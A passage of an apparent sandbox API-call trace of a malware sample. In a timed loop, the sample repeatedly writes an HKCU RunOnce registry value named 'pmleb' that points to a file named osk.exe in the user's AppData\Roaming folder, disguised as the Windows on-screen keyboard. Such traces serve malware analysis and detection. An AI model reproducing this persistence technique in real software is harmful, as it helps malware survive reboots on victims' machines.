lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.259] RegCloseKey (hKey=0x280) returned 0x0 [0086.259] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.259] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.259] SetTimer (hWnd=0x20280, nIDEvent=0x21d6, uElapse=0xa, lpTimerFunc=0x0) returned 0x21d6 [0086.259] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.274] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.274] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.274] KillTimer (hWnd=0x20280, uIDEvent=0x21d6) returned 1 [0086.274] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.274] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.274] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.275] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.275] RegCloseKey (hKey=0x280) returned 0x0 [0086.275] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.275] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.275] SetTimer (hWnd=0x20280, nIDEvent=0x21d7, uElapse=0xa, lpTimerFunc=0x0) returned 0x21d7 [0086.275] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0091.595] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0091.595] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0091.596] KillTimer (hWnd=0x20280, uIDEvent=0x21d7) returned 1 [0091.596] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.597] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0091.597] IUnknown:Release (This=0x787518) returned 0x1 [0091.598] GetCurrentThreadId () returned 0x544 [0091.598] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0091.599] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0091.599] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0091.601] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0091.601] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0091.601] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0091.601] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0091.601] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0091.601] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0091.601] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5c [0091.601] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0091.601] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5d [0091.601] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0091.603] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5c [0091.603] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.603] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0091.603] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.603] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.604] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0091.604] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0091.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0091.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0091.604] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0091.604] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0091.605] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0091.605] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0091.605] RegCloseKey (hKey=0x280) returned 0x0 [0091.605] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.605] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.605] SetTimer (hWnd=0x20280, nIDEvent=0x21d8, uElapse=0xa, lpTimerFunc=0x0) returned 0x21d8 [0091.605] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0091.609] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0091.609] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0091.609] KillTimer (hWnd=0x20280, uIDEvent=0x21d8) returned 1 [0091.609] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.609] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0091.609] IUnknown:Release (This=0x787518) returned 0x1 [0091.609] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0091.609] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0091.609] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0091.610] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0091.610] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0091.610] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0091.610] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0091.610] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0091.610] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0091.610] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5d [0091.610] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0091.610] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5e [0091.610] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0091.611] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5d [0091.611] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.611] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0091.611] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.611] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.611] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0091.611] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0091.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0091.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0091.611] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0091.611] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0091.612] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0091.612] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0091.612] RegCloseKey (hKey=0x280) returned 0x0 [0091.612] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.612] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.612] SetTimer (hWnd=0x20280, nIDEvent=0x21d9, uElapse=0xa, lpTimerFunc=0x0) returned 0x21d9 [0091.612] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0091.624] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0091.624] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0091.624] KillTimer (hWnd=0x20280, uIDEvent=0x21d9) returned 1 [0091.625] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.625] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0091.625] IUnknown:Release (This=0x787518) returned 0x1 [0091.625] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0091.625] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0091.625] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0091.625] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0091.626] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0091.626] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0091.626] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0091.626] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0091.626] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0091.626] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5e [0091.626] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0091.626] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5f [0091.626] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0091.627] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5e [0091.627] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.627] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0091.627] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.627] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.627] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0091.627] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0091.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0091.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0091.627] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0091.627] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0091.628] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0091.628] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0091.628] RegCloseKey (hKey=0x280) returned 0x0 [0091.628] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.628] 